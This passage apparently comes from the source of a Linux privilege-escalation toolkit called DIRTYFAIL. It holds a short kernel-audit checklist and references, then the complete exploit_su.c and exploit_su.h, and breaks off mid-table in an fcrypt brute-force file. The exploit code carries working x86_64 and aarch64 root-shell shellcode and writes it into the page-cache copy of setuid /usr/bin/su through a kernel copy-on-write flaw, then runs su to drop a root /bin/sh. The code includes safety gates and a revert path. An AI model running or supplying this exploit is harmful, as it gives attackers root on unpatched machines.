1. Does it call `skb_cow_data()` BEFORE building the AEAD
scatterlist?
2. Is there a conditional branch (typically based on `skb_cloned`,
`skb_has_frag_list`, `skb_is_nonlinear`) that bypasses (1)?
3. Is the resulting scatterlist used as BOTH src AND dst of
`aead_request_set_crypt()` / equivalent?
4. Can a userspace primitive (`splice(2)`, `sendfile(2)`,
`sendmsg(MSG_SPLICE_PAGES)`, AF_ALG send) deliver
attacker-controlled pages into the input skb's frags?
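The bug class applies only when copy-on-write is missing or bypassable
(the answer to 1 is "no", or the answer to 2 is "yes") and the answers
to 3 and 4 are both "yes". Any other combination is sufficient for
"not vulnerable."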
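The checklist can be written down as a tiny decision function, which is handy when recording verdicts for many paths. This sketch reads question 1 as protective (a "yes" helps the path) and question 2 as the bypass that undoes it; `classify_path` and its output strings are illustrative only.

```bash
#!/usr/bin/env bash
# Verdict from the four checklist answers, each "yes" or "no":
#   $1 skb_cow_data() called before the scatterlist is built?
#   $2 a conditional branch can bypass that call?
#   $3 same scatterlist used as both src and dst?
#   $4 userspace can deliver page-cache pages into the skb frags?
# A path is flagged only if COW is missing or skippable AND the crypto
# is in place AND the frags are splice-reachable.
classify_path() {
    local cow="$1" skip="$2" inplace="$3" splice="$4"
    local cow_bypassable="no"
    if [ "$cow" = "no" ] || [ "$skip" = "yes" ]; then
        cow_bypassable="yes"
    fi
    if [ "$cow_bypassable" = "yes" ] && [ "$inplace" = "yes" ] && [ "$splice" = "yes" ]; then
        echo "candidate: audit further"
    else
        echo "not vulnerable"
    fi
}
```

For example, the pre-patch `esp_input` answers are `yes yes yes yes`, which yields a candidate, while WireGuard's `yes no yes yes` and kTLS send's `no no no yes` both come out as not vulnerable.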
---
## §2. References
- V4bel/dirtyfrag write-up — [github.com/V4bel/dirtyfrag/blob/master/assets/write-up.md](https://github.com/V4bel/dirtyfrag/blob/master/assets/write-up.md)
- Theori/Xint Copy Fail disclosure — [xint.io/blog/copy-fail-linux-distributions](https://xint.io/blog/copy-fail-linux-distributions)
- LWN — Replace sendpage with sendmsg(MSG_SPLICE_PAGES) — [lwn.net/Articles/928487](https://lwn.net/Articles/928487/)
- LWN — Handle MSG_SPLICE_PAGES in AF_TLS — [lwn.net/Articles/933386](https://lwn.net/Articles/933386/)
- TLS 1.3 Rx improvements (Kicinski) — [people.kernel.org/kuba/tls-1-3-rx-improvements-in-linux-5-20](https://people.kernel.org/kuba/tls-1-3-rx-improvements-in-linux-5-20)
- 0xdeadbeefnetwork Copy_Fail2 (GCM variant) — [github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo](https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo)
- Linux source (torvalds/master) — `net/ipv4/ah4.c`, `net/ipv6/ah6.c`, `net/xfrm/xfrm_ipcomp.c`, `drivers/net/macsec.c`, `net/tls/tls_sw.c`
+530
@@ -0,0 +1,530 @@
/*
* DIRTYFAIL exploit_su.c
*
* V4bel-style page-cache shellcode injection against /usr/bin/su.
* See exploit_su.h for the high-level rationale.
*/
#include "exploit_su.h"
#include "copyfail.h"
#include "common.h"
#ifdef __linux__
#include <elf.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
#define SU_PATH "/usr/bin/su"
#define STATE_PATH "/var/tmp/.dirtyfail-su.state"
#define STATE_MAGIC "DFSU0001"
/* x86_64 shellcode: setuid(0); setgid(0); execve("/bin/sh", argv, NULL)
* with argv = ["/bin/sh", NULL]. The proper argv matters: NULL argv
* makes the kernel substitute argv[0]="" (printk: "launched '/bin/sh'
* with NULL argv: empty string added"), and bash/sh-as-init-script
* with empty argv[0] doesn't read commands from stdin reliably.
*
* Layout:
* 0x00 xor rdi, rdi ; mov eax, 105 ; syscall setuid(0) [10]
* 0x0a xor rdi, rdi ; mov eax, 106 ; syscall setgid(0) [10]
* 0x14 mov rbx, "/bin/sh\0" ; push rbx pathname on stack [11]
* 0x1f mov r9, rsp r9 = path ptr [3]
* 0x22 xor rax, rax ; push rax ; push r9 argv = [path,NULL][6]
* 0x28 mov rsi, rsp ; mov rdi, r9 argv, pathname [6]
* 0x2e xor rdx, rdx ; mov eax, 0x3b ; syscall envp=NULL, execve [10]
*
* Total: 56 bytes = 14 chained 4-byte writes via cf_4byte_write. */
__attribute__((unused))
static const unsigned char shellcode_x86_64[56] = {
/* setuid(0) — 10 bytes */
0x48,0x31,0xff,
0xb8,0x69,0x00,0x00,0x00,
0x0f,0x05,
/* setgid(0) — 10 bytes */
0x48,0x31,0xff,
0xb8,0x6a,0x00,0x00,0x00,
0x0f,0x05,
/* mov rbx, "/bin/sh\0" ; push rbx — 11 bytes */
0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,
0x53,
/* mov r9, rsp — 3 bytes */
0x49,0x89,0xe1,
/* xor rax, rax ; push rax ; push r9 — 6 bytes */
0x48,0x31,0xc0,
0x50,
0x41,0x51,
/* mov rsi, rsp ; mov rdi, r9 — 6 bytes */
0x48,0x89,0xe6,
0x4c,0x89,0xcf,
/* xor rdx, rdx ; mov eax, 0x3b ; syscall — 10 bytes */
0x48,0x31,0xd2,
0xb8,0x3b,0x00,0x00,0x00,
0x0f,0x05,
};
/* aarch64 shellcode: same semantics as x86_64 above (setuid(0),
* setgid(0), execve("/bin/sh", ["/bin/sh", NULL], NULL)) encoded for
* the aarch64 syscall ABI (x8 = syscall number, x0..x5 = args,
* `svc #0` to invoke). 20 instructions × 4 bytes = 80 bytes.
*
* STATUS: UNTESTED on hardware. The bytes were derived by manually
* cross-referencing each instruction against the ARMv8-A reference
* manual; the matching assembly source ships in
* `tools/exploit_su_aarch64.S` so anyone with `aarch64-linux-gnu-as`
* can regenerate and verify. Runtime is gated behind the env var
* `DIRTYFAIL_AARCH64_TRUST_UNTESTED=1` to prevent accidental use. */
__attribute__((unused))
static const unsigned char shellcode_aarch64[80] = {
/* setuid(0) — movz x0,#0 ; movz x8,#146 ; svc #0 */
0x00,0x00,0x80,0xd2,
0x48,0x12,0x80,0xd2,
0x01,0x00,0x00,0xd4,
/* setgid(0) — movz x0,#0 ; movz x8,#144 ; svc #0 */
0x00,0x00,0x80,0xd2,
0x08,0x12,0x80,0xd2,
0x01,0x00,0x00,0xd4,
/* "/bin/sh\0" -> x9 (4× movz/movk lsl) */
0xe9,0x45,0x8c,0xd2, /* movz x9, #0x622f */
0x29,0xcd,0xad,0xf2, /* movk x9, #0x6e69, lsl 16 */
0xe9,0x65,0xce,0xf2, /* movk x9, #0x732f, lsl 32 */
0x09,0x0d,0xe0,0xf2, /* movk x9, #0x0068, lsl 48 */
/* push string : sp -= 16 ; *sp = x9 */
0xe9,0x0f,0x1f,0xf8, /* str x9, [sp, #-16]! */
0xe9,0x03,0x00,0x91, /* mov x9, sp */
/* argv = [x9, NULL] on stack */
0xff,0x43,0x00,0xd1, /* sub sp, sp, #16 */
0xff,0x07,0x00,0xf9, /* str xzr, [sp, #8] */
0xe9,0x03,0x00,0xf9, /* str x9, [sp, #0] */
/* execve(x9, sp, NULL) — syscall 221 */
0xe0,0x03,0x09,0xaa, /* mov x0, x9 */
0xe1,0x03,0x00,0x91, /* mov x1, sp */
0xe2,0x03,0x1f,0xaa, /* mov x2, xzr */
0xa8,0x1b,0x80,0xd2, /* movz x8, #221 */
0x01,0x00,0x00,0xd4, /* svc #0 */
};
/* Build-time arch selection: pick the right shellcode at compile time
* based on the target architecture. SHELLCODE_LEN must be a multiple
* of 4 since cf_4byte_write plants 4 bytes at a time. The unused
* sibling shellcode array is suppressed with __attribute__((unused))
* up at its definition. */
#if defined(__x86_64__) || defined(__amd64__)
# define SHELLCODE_BYTES shellcode_x86_64
# define SHELLCODE_LEN ((int)sizeof(shellcode_x86_64))
# define SHELLCODE_ARCH "x86_64"
# define SHELLCODE_TESTED 1
# define SHELLCODE_PRESENT 1
#elif defined(__aarch64__)
# define SHELLCODE_BYTES shellcode_aarch64
# define SHELLCODE_LEN ((int)sizeof(shellcode_aarch64))
# define SHELLCODE_ARCH "aarch64"
# define SHELLCODE_TESTED 0
# define SHELLCODE_PRESENT 1
#else
# define SHELLCODE_BYTES shellcode_x86_64 /* placeholder, never used */
# define SHELLCODE_LEN 0
# define SHELLCODE_ARCH "unknown"
# define SHELLCODE_TESTED 0
# define SHELLCODE_PRESENT 0
#endif
/* Convenience name kept matching pre-existing usages. */
#define shellcode SHELLCODE_BYTES
/* State file: stash original entry-point bytes so we can revert. */
struct su_state {
char magic[8]; /* "DFSU0001" */
char target_path[256];
uint64_t file_offset;
uint64_t original_len; /* always SHELLCODE_LEN, but explicit for forward-compat */
unsigned char original[SHELLCODE_LEN];
};
/* ---------------------------------------------------------------- *
* ELF parsing: find the file offset of the entry point in /usr/bin/su.
* ---------------------------------------------------------------- */
static bool resolve_entry_offset(const char *path, off_t *out_offset)
{
int fd = open(path, O_RDONLY);
if (fd < 0) {
log_bad("open %s: %s", path, strerror(errno));
return false;
}
Elf64_Ehdr ehdr;
if (pread(fd, &ehdr, sizeof(ehdr), 0) != sizeof(ehdr)) {
log_bad("read ELF header: %s", strerror(errno));
close(fd); return false;
}
if (memcmp(ehdr.e_ident, ELFMAG, 4) != 0) {
log_bad("%s is not an ELF file", path);
close(fd); return false;
}
if (ehdr.e_ident[EI_CLASS] != ELFCLASS64) {
log_bad("%s is not 64-bit ELF (this exploit requires x86_64)", path);
close(fd); return false;
}
if (ehdr.e_machine != EM_X86_64) {
log_bad("%s is not x86_64 (machine=0x%x); shellcode is x86_64-only",
path, ehdr.e_machine);
close(fd); return false;
}
/* Walk program headers to find the LOAD segment containing e_entry. */
Elf64_Phdr phdr;
bool found = false;
for (int i = 0; i < ehdr.e_phnum; i++) {
off_t poff = ehdr.e_phoff + (off_t)i * ehdr.e_phentsize;
if (pread(fd, &phdr, sizeof(phdr), poff) != sizeof(phdr)) {
log_bad("read phdr[%d]: %s", i, strerror(errno));
close(fd); return false;
}
if (phdr.p_type != PT_LOAD) continue;
if (!(phdr.p_flags & PF_X)) continue; /* must be executable */
if (ehdr.e_entry < phdr.p_vaddr) continue;
if (ehdr.e_entry >= phdr.p_vaddr + phdr.p_memsz) continue;
*out_offset = phdr.p_offset + (ehdr.e_entry - phdr.p_vaddr);
found = true;
break;
}
close(fd);
if (!found) {
log_bad("could not locate executable LOAD segment containing e_entry "
"(0x%llx) in %s", (unsigned long long)ehdr.e_entry, path);
return false;
}
/* Sanity: ensure the SHELLCODE_LEN-byte plant region fits inside the file. */
struct stat st;
if (stat(path, &st) < 0) { log_bad("stat: %s", strerror(errno)); return false; }
if ((uint64_t)*out_offset + SHELLCODE_LEN > (uint64_t)st.st_size) {
log_bad("entry offset 0x%llx + %d would overflow %s (size 0x%llx)",
(unsigned long long)*out_offset, SHELLCODE_LEN,
path, (unsigned long long)st.st_size);
return false;
}
return true;
}
/* ---------------------------------------------------------------- *
* Backup / revert
* ---------------------------------------------------------------- */
static bool save_original(const char *path, off_t off)
{
int fd = open(path, O_RDONLY);
if (fd < 0) { log_bad("open %s: %s", path, strerror(errno)); return false; }
struct su_state st = {0};
memcpy(st.magic, STATE_MAGIC, 8);
strncpy(st.target_path, path, sizeof(st.target_path) - 1);
st.file_offset = (uint64_t)off;
st.original_len = SHELLCODE_LEN;
if (pread(fd, st.original, SHELLCODE_LEN, off) != SHELLCODE_LEN) {
log_bad("pread original %d bytes: %s", SHELLCODE_LEN, strerror(errno));
close(fd); return false;
}
close(fd);
int sfd = open(STATE_PATH, O_WRONLY | O_CREAT | O_TRUNC, 0600);
if (sfd < 0) { log_bad("open %s: %s", STATE_PATH, strerror(errno)); return false; }
if (write(sfd, &st, sizeof(st)) != sizeof(st)) {
log_bad("write state: %s", strerror(errno));
close(sfd); unlink(STATE_PATH); return false;
}
close(sfd);
log_ok("stashed original %d bytes from %s+0x%llx → %s",
SHELLCODE_LEN, path, (unsigned long long)off, STATE_PATH);
return true;
}
/* Read state, return false if missing or malformed. */
static bool load_state(struct su_state *out)
{
int sfd = open(STATE_PATH, O_RDONLY);
if (sfd < 0) {
log_bad("open %s: %s", STATE_PATH, strerror(errno));
return false;
}
if (read(sfd, out, sizeof(*out)) != sizeof(*out)) {
log_bad("read state: %s", strerror(errno));
close(sfd); return false;
}
close(sfd);
if (memcmp(out->magic, STATE_MAGIC, 8) != 0) {
log_bad("state file magic mismatch");
return false;
}
if (out->original_len != SHELLCODE_LEN) {
log_bad("state file original_len=%llu (expected %d)",
(unsigned long long)out->original_len, SHELLCODE_LEN);
return false;
}
return true;
}
/* ---------------------------------------------------------------- *
* Plant + verify
* ---------------------------------------------------------------- */
static bool plant_shellcode(const char *path, off_t base_off,
const unsigned char *bytes, size_t len)
{
if (len % 4 != 0) { log_bad("plant len %zu not multiple of 4", len); return false; }
log_step("planting %zu bytes of shellcode via %zu chained 4-byte writes",
len, len / 4);
for (size_t i = 0; i < len; i += 4) {
unsigned char chunk[4];
memcpy(chunk, bytes + i, 4);
if (!cf_4byte_write(path, base_off + (off_t)i, chunk)) {
log_bad("cf_4byte_write[%zu] failed at offset 0x%llx",
i / 4, (unsigned long long)(base_off + i));
return false;
}
/* Compact progress dot per chunk; no full-line spam. */
fputc('.', stdout); fflush(stdout);
}
fputc('\n', stdout);
return true;
}
static bool verify_plant(const char *path, off_t off,
const unsigned char *expected, size_t len)
{
int fd = open(path, O_RDONLY);
if (fd < 0) { log_bad("verify open: %s", strerror(errno)); return false; }
unsigned char got[SHELLCODE_LEN];
if (pread(fd, got, len, off) != (ssize_t)len) {
log_bad("verify pread: %s", strerror(errno));
close(fd); return false;
}
close(fd);
return memcmp(got, expected, len) == 0;
}
/* try_revert_su_pages: best-effort revert. We don't have CAP_SYS_ADMIN
* to drop_caches in init ns from an unprivileged process, but
* POSIX_FADV_DONTNEED on a freshly-opened fd typically evicts the
* affected pages on most kernels. */
static bool try_revert_su_pages(const char *path, off_t off,
const unsigned char *original, size_t len)
{
if (!plant_shellcode(path, off, original, len)) {
log_warn("revert plant failed — page cache may still be poisoned");
return false;
}
int fd = open(path, O_RDONLY);
if (fd >= 0) {
#ifdef POSIX_FADV_DONTNEED
posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);
#endif
close(fd);
}
/* Verify the revert landed correctly. */
if (!verify_plant(path, off, original, len)) {
log_warn("revert verification failed — bytes do not match original");
return false;
}
return true;
}
/* ---------------------------------------------------------------- *
* Public entry points
* ---------------------------------------------------------------- */
df_result_t exploit_su_shellcode(bool do_shell)
{
log_step("Copy Fail — /usr/bin/su page-cache shellcode injection");
const char *target = getenv("DIRTYFAIL_SU_PATH");
if (!target || !*target) target = SU_PATH;
/* Architecture preflight. We ship two shellcodes:
* x86_64: tested end-to-end on Fedora 44 (real-root proven).
* aarch64: manually encoded from the ARMv8-A reference and
* never executed on hardware. Gated behind an env
* var so an aarch64 user has to opt in explicitly.
* Anything else has no shellcode and aborts here. */
if (!SHELLCODE_PRESENT) {
log_bad("no shellcode for this architecture (built for %s); "
"DIRTYFAIL --exploit-su currently supports x86_64 and "
"aarch64 only.", SHELLCODE_ARCH);
return DF_PRECOND_FAIL;
}
if (!SHELLCODE_TESTED && !getenv("DIRTYFAIL_AARCH64_TRUST_UNTESTED")) {
log_bad("running on %s, where the shipped shellcode has NOT been "
"tested on hardware. Aborting to avoid bricking /usr/bin/su.",
SHELLCODE_ARCH);
log_hint("if you've reviewed tools/exploit_su_aarch64.S and want to "
"proceed at your own risk, set "
"DIRTYFAIL_AARCH64_TRUST_UNTESTED=1 in the environment.");
log_hint("recommended verification: assemble the .S file with "
"`aarch64-linux-gnu-as` and confirm the byte sequence "
"matches `shellcode_aarch64[]` in src/exploit_su.c.");
return DF_PRECOND_FAIL;
}
if (!SHELLCODE_TESTED) {
log_warn("DIRTYFAIL_AARCH64_TRUST_UNTESTED=1: proceeding with "
"untested aarch64 shellcode (%d bytes). If /usr/bin/su "
"breaks, run `dirtyfail --cleanup-su` (or reboot) to "
"evict the modified page from the cache.", SHELLCODE_LEN);
}
struct stat st;
if (stat(target, &st) < 0) {
log_bad("stat %s: %s", target, strerror(errno));
return DF_PRECOND_FAIL;
}
if (!(st.st_mode & S_ISUID) || st.st_uid != 0) {
log_bad("%s is not setuid root (mode=0%o uid=%u)",
target, st.st_mode, st.st_uid);
log_hint("the exploit relies on the setuid bit; without it, the "
"shellcode runs at our existing uid and gains nothing.");
return DF_PRECOND_FAIL;
}
off_t entry_off;
if (!resolve_entry_offset(target, &entry_off)) return DF_TEST_ERROR;
log_ok("/usr/bin/su entry point at file offset 0x%llx",
(unsigned long long)entry_off);
log_warn("about to overwrite %d bytes of %s in the page cache",
SHELLCODE_LEN, target);
log_warn("if this fails or the shellcode crashes, /usr/bin/su will be "
"broken system-wide until --cleanup-su or `drop_caches`");
/* CRITICAL: disable libc stdin buffering before the typed_confirm
* read. Otherwise fgets() pulls extra bytes from the pipe into libc's
* buffer, and that buffer is lost when execve() replaces our process:
* the exec'd /bin/sh then sees an empty stdin and exits without running
* any commands the user piped in. With _IONBF, fgets() does 1-byte
* reads and leaves the rest of the pipe contents in the kernel. */
setvbuf(stdin, NULL, _IONBF, 0);
if (!typed_confirm("DIRTYFAIL")) {
log_bad("confirmation declined");
return DF_OK;
}
if (!save_original(target, entry_off)) return DF_TEST_ERROR;
if (!plant_shellcode(target, entry_off, shellcode, SHELLCODE_LEN)) {
log_warn("plant failed mid-stream — attempting revert");
struct su_state st_in;
if (load_state(&st_in) &&
try_revert_su_pages(target, entry_off, st_in.original, SHELLCODE_LEN)) {
unlink(STATE_PATH);
}
return DF_EXPLOIT_FAIL;
}
if (!verify_plant(target, entry_off, shellcode, SHELLCODE_LEN)) {
log_bad("verify: page cache does not match planted shellcode "
"(kernel likely patched, or AF_ALG/algif_aead blocked)");
struct su_state st_in;
if (load_state(&st_in) &&
try_revert_su_pages(target, entry_off, st_in.original, SHELLCODE_LEN)) {
unlink(STATE_PATH);
}
return DF_EXPLOIT_FAIL;
}
log_ok("page cache of %s now contains shellcode at entry point", target);
if (!do_shell) {
log_step("--no-shell: reverting via DONTNEED+rewrite");
struct su_state st_in;
if (load_state(&st_in) &&
try_revert_su_pages(target, entry_off, st_in.original, SHELLCODE_LEN)) {
log_ok("page cache reverted successfully");
unlink(STATE_PATH);
} else {
log_warn("revert may have failed — run `sudo dirtyfail --cleanup-su` "
"or reboot before using su again");
}
return DF_EXPLOIT_OK;
}
log_ok("invoking %s — kernel will exec setuid-root, jump to our shellcode, "
"and drop a /bin/sh root shell", target);
log_hint("when you exit the shell, run `sudo dirtyfail --cleanup-su` to "
"restore /usr/bin/su (or reboot — page cache is RAM-only)");
execl(target, "su", (char *)NULL);
log_bad("execl: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
/* Describe state file if present, for `--list-state`. Returns true if
* an exploit-su state file was found and described, false if absent.
* Silent when file is missing (the normal case). */
bool exploit_su_list_state(void)
{
struct stat ignored;
if (stat(STATE_PATH, &ignored) < 0) return false; /* clean state */
struct su_state st_in;
if (!load_state(&st_in)) return false;
log_warn("/usr/bin/su shellcode planted — state file %s", STATE_PATH);
log_hint(" target: %s, entry-point file offset: 0x%llx",
st_in.target_path, (unsigned long long)st_in.file_offset);
log_hint(" original %llu bytes stashed.",
(unsigned long long)st_in.original_len);
log_hint(" the page cache currently has x86_64 setuid+execve(/bin/sh)");
log_hint(" shellcode in place of the above. Revert with `--cleanup-su`.");
return true;
}
df_result_t cleanup_su_shellcode(void)
{
log_step("--cleanup-su: restore /usr/bin/su entry-point bytes from %s",
STATE_PATH);
struct su_state st_in;
if (!load_state(&st_in)) return DF_TEST_ERROR;
log_hint("target: %s, file_offset: 0x%llx", st_in.target_path,
(unsigned long long)st_in.file_offset);
if (!try_revert_su_pages(st_in.target_path, (off_t)st_in.file_offset,
st_in.original, SHELLCODE_LEN)) {
log_bad("revert failed — manual fix needed: "
"`echo 3 | sudo tee /proc/sys/vm/drop_caches`");
return DF_TEST_ERROR;
}
if (unlink(STATE_PATH) == 0) {
log_ok("page cache restored and state file removed");
} else {
log_warn("page cache restored but %s could not be removed: %s",
STATE_PATH, strerror(errno));
}
return DF_OK;
}
#else /* !__linux__ */
df_result_t exploit_su_shellcode(bool do_shell)
{
(void)do_shell;
return DF_TEST_ERROR;
}
df_result_t cleanup_su_shellcode(void)
{
return DF_TEST_ERROR;
}
bool exploit_su_list_state(void)
{
return false;
}
#endif
+56
@@ -0,0 +1,56 @@
/*
* DIRTYFAIL exploit_su.h
*
* V4bel-style page-cache shellcode injection against /usr/bin/su.
*
* Different chain than the /etc/passwd UID-flip exploits:
* - Targets /usr/bin/su's ELF entry point in the page cache
* - Plants ~48 bytes of x86_64 shellcode (setuid(0); setgid(0);
* execve("/bin/sh")) via 12 chained 4-byte writes
* - When /usr/bin/su is exec'd, kernel sets euid=0 (setuid bit on
* disk, unaffected by page-cache mods), dynamic linker resolves,
* control transfers to entry point -> our shellcode -> /bin/sh
*
* Mitigation profile vs. /etc/passwd flip:
* + Bypasses `pam_unix nullok` removal: no PAM dependency at all
* + Works even if password rotation policy enforces complex passwords
* - Crashes /usr/bin/su system-wide if shellcode is wrong (until
* drop_caches or reboot)
* - Stash-and-revert is the safety net: cleanup-su restores the
* original 48 bytes from /var/tmp/.dirtyfail-su.state.
*
* Architecture: x86_64 is the only tested target. The x86_64 shellcode
* is hardcoded for the SYSV amd64 syscall ABI. exploit_su.c also carries
* an aarch64 blob that has never run on hardware and is refused unless
* DIRTYFAIL_AARCH64_TRUST_UNTESTED is set in the environment.
*
* Reference: V4bel/dirtyfrag's xfrm-ESP variant uses the same target
* file pattern with a different (4-byte) primitive. Theori's Xint
* disclosure uses /usr/bin/su as the canonical target.
*/
#ifndef DIRTYFAIL_EXPLOIT_SU_H
#define DIRTYFAIL_EXPLOIT_SU_H
#include "common.h"
/* End-to-end PoC: locate /usr/bin/su (or DIRTYFAIL_SU_PATH override),
* stash original entry-point bytes, plant shellcode, verify, and
* (if do_shell) exec the target with argv[0] "su" so the kernel runs our
* hijacked /usr/bin/su as setuid root and the shellcode runs /bin/sh.
*
* `do_shell=false` runs the plant + verify + revert sequence, which is
* useful for testing the primitive without leaving the system in a
* broken state (su would otherwise be unusable until drop_caches). */
df_result_t exploit_su_shellcode(bool do_shell);
/* Restore /usr/bin/su's original entry-point bytes from
* /var/tmp/.dirtyfail-su.state, then ask the kernel to evict the
* modified page (POSIX_FADV_DONTNEED) and verify the result. Returns
* DF_OK on success, DF_TEST_ERROR if the state file is missing or
* invalid, or if the revert could not be applied and verified. */
df_result_t cleanup_su_shellcode(void);
/* Used by --list-state. Returns true if /var/tmp/.dirtyfail-su.state
* is present (and prints a summary), false if absent. Side-effect free. */
bool exploit_su_list_state(void);
#endif
+303
@@ -0,0 +1,303 @@
/*
* DIRTYFAIL fcrypt.c
*
* Implementation of the rxkad fcrypt block cipher and a user-space
* brute-force search loop.
*
* ATTRIBUTION
* -----------
* The four 256-byte S-box tables (`SBOX0_RAW` through `SBOX3_RAW`) and
* the 8-byte 56-bit key packing + 11-bit rotation key schedule are the
* standard rxkad / fcrypt protocol constants, also present in the
* Linux kernel `crypto/fcrypt.c` (GPL-2.0, David Howells / KTH).
*
* The implementation code below (table preprocessing, round-key
* struct, brute-force harness, predicates) is fresh DIRTYFAIL code.
* The cipher tables themselves are protocol facts; using them is what
* makes interoperability with the kernel possible.
*
* See NOTICE.md.
*
* SELF-TEST VECTORS (from the kernel test suite):
* K = 00 00 00 00 00 00 00 00 -> decrypt(0E0900C73EF7ED41) = 00000000 00000000
* K = 11 44 77 AA DD 00 33 66 -> decrypt(D8ED787477EC0680) = 12345678 9ABCDEF0
*/
#include "fcrypt.h"
#include <arpa/inet.h> /* htonl(): host to big-endian 32-bit, portable */
#include <time.h>
#include <string.h>
/* -------- raw S-box bytes ------------------------------------------------ *
*
* These are the rxkad protocol S-boxes, exactly as specified.
* They are pre-shifted into 32-bit form by fcrypt_init() so the inner
* round function (FF) is just four XORs of 32-bit lookups.
*/
static const uint8_t SBOX0_RAW[256] = {
0xea,0x7f,0xb2,0x64,0x9d,0xb0,0xd9,0x11,0xcd,0x86,0x86,0x91,0x0a,0xb2,0x93,0x06,
0x0e,0x06,0xd2,0x65,0x73,0xc5,0x28,0x60,0xf2,0x20,0xb5,0x38,0x7e,0xda,0x9f,0xe3,
0xd2,0xcf,0xc4,0x3c,0x61,0xff,0x4a,0x4a,0x35,0xac,0xaa,0x5f,0x2b,0xbb,0xbc,0x53,
0x4e,0x9d,0x78,0xa3,0xdc,0x09,0x32,0x10,0xc6,0x6f,0x66,0xd6,0xab,0xa9,0xaf,0xfd,
0x3b,0x95,0xe8,0x34,0x9a,0x81,0x72,0x80,0x9c,0xf3,0xec,0xda,0x9f,0x26,0x76,0x15,
0x3e,0x55,0x4d,0xde,0x84,0xee,0xad,0xc7,0xf1,0x6b,0x3d,0xd3,0x04,0x49,0xaa,0x24,
0x0b,0x8a,0x83,0xba,0xfa,0x85,0xa0,0xa8,0xb1,0xd4,0x01,0xd8,0x70,0x64,0xf0,0x51,
0xd2,0xc3,0xa7,0x75,0x8c,0xa5,0x64,0xef,0x10,0x4e,0xb7,0xc6,0x61,0x03,0xeb,0x44,
0x3d,0xe5,0xb3,0x5b,0xae,0xd5,0xad,0x1d,0xfa,0x5a,0x1e,0x33,0xab,0x93,0xa2,0xb7,
0xe7,0xa8,0x45,0xa4,0xcd,0x29,0x63,0x44,0xb6,0x69,0x7e,0x2e,0x62,0x03,0xc8,0xe0,
0x17,0xbb,0xc7,0xf3,0x3f,0x36,0xba,0x71,0x8e,0x97,0x65,0x60,0x69,0xb6,0xf6,0xe6,
0x6e,0xe0,0x81,0x59,0xe8,0xaf,0xdd,0x95,0x22,0x99,0xfd,0x63,0x19,0x74,0x61,0xb1,
0xb6,0x5b,0xae,0x54,0xb3,0x70,0xff,0xc6,0x3b,0x3e,0xc1,0xd7,0xe1,0x0e,0x76,0xe5,
0x36,0x4f,0x59,0xc7,0x08,0x6e,0x82,0xa6,0x93,0xc4,0xaa,0x26,0x49,0xe0,0x21,0x64,
0x07,0x9f,0x64,0x81,0x9c,0xbf,0xf9,0xd1,0x43,0xf8,0xb6,0xb9,0xf1,0x24,0x75,0x03,
0xe4,0xb0,0x99,0x46,0x3d,0xf5,0xd1,0x39,0x72,0x12,0xf6,0xba,0x0c,0x0d,0x42,0x2e,
};
static const uint8_t SBOX1_RAW[256] = {
0x77,0x14,0xa6,0xfe,0xb2,0x5e,0x8c,0x3e,0x67,0x6c,0xa1,0x0d,0xc2,0xa2,0xc1,0x85,
0x6c,0x7b,0x67,0xc6,0x23,0xe3,0xf2,0x89,0x50,0x9c,0x03,0xb7,0x73,0xe6,0xe1,0x39,
0x31,0x2c,0x27,0x9f,0xa5,0x69,0x44,0xd6,0x23,0x83,0x98,0x7d,0x3c,0xb4,0x2d,0x99,
0x1c,0x1f,0x8c,0x20,0x03,0x7c,0x5f,0xad,0xf4,0xfa,0x95,0xca,0x76,0x44,0xcd,0xb6,
0xb8,0xa1,0xa1,0xbe,0x9e,0x54,0x8f,0x0b,0x16,0x74,0x31,0x8a,0x23,0x17,0x04,0xfa,
0x79,0x84,0xb1,0xf5,0x13,0xab,0xb5,0x2e,0xaa,0x0c,0x60,0x6b,0x5b,0xc4,0x4b,0xbc,
0xe2,0xaf,0x45,0x73,0xfa,0xc9,0x49,0xcd,0x00,0x92,0x7d,0x97,0x7a,0x18,0x60,0x3d,
0xcf,0x5b,0xde,0xc6,0xe2,0xe6,0xbb,0x8b,0x06,0xda,0x08,0x15,0x1b,0x88,0x6a,0x17,
0x89,0xd0,0xa9,0xc1,0xc9,0x70,0x6b,0xe5,0x43,0xf4,0x68,0xc8,0xd3,0x84,0x28,0x0a,
0x52,0x66,0xa3,0xca,0xf2,0xe3,0x7f,0x7a,0x31,0xf7,0x88,0x94,0x5e,0x9c,0x63,0xd5,
0x24,0x66,0xfc,0xb3,0x57,0x25,0xbe,0x89,0x44,0xc4,0xe0,0x8f,0x23,0x3c,0x12,0x52,
0xf5,0x1e,0xf4,0xcb,0x18,0x33,0x1f,0xf8,0x69,0x10,0x9d,0xd3,0xf7,0x28,0xf8,0x30,
0x05,0x5e,0x32,0xc0,0xd5,0x19,0xbd,0x45,0x8b,0x5b,0xfd,0xbc,0xe2,0x5c,0xa9,0x96,
0xef,0x70,0xcf,0xc2,0x2a,0xb3,0x61,0xad,0x80,0x48,0x81,0xb7,0x1d,0x43,0xd9,0xd7,
0x45,0xf0,0xd8,0x8a,0x59,0x7c,0x57,0xc1,0x79,0xc7,0x34,0xd6,0x43,0xdf,0xe4,0x78,
0x16,0x06,0xda,0x92,0x76,0x51,0xe1,0xd4,0x70,0x03,0xe0,0x2f,0x96,0x91,0x82,0x80,
};
static const uint8_t SBOX2_RAW[256] = {
0xf0,0x37,0x24,0x53,0x2a,0x03,0x83,0x86,0xd1,0xec,0x50,0xf0,0x42,0x78,0x2f,0x6d,
0xbf,0x80,0x87,0x27,0x95,0xe2,0xc5,0x5d,0xf9,0x6f,0xdb,0xb4,0x65,0x6e,0xe7,0x24,
0xc8,0x1a,0xbb,0x49,0xb5,0x0a,0x7d,0xb9,0xe8,0xdc,0xb7,0xd9,0x45,0x20,0x1b,0xce,
0x59,0x9d,0x6b,0xbd,0x0e,0x8f,0xa3,0xa9,0xbc,0x74,0xa6,0xf6,0x7f,0x5f,0xb1,0x68,
0x84,0xbc,0xa9,0xfd,0x55,0x50,0xe9,0xb6,0x13,0x5e,0x07,0xb8,0x95,0x02,0xc0,0xd0,
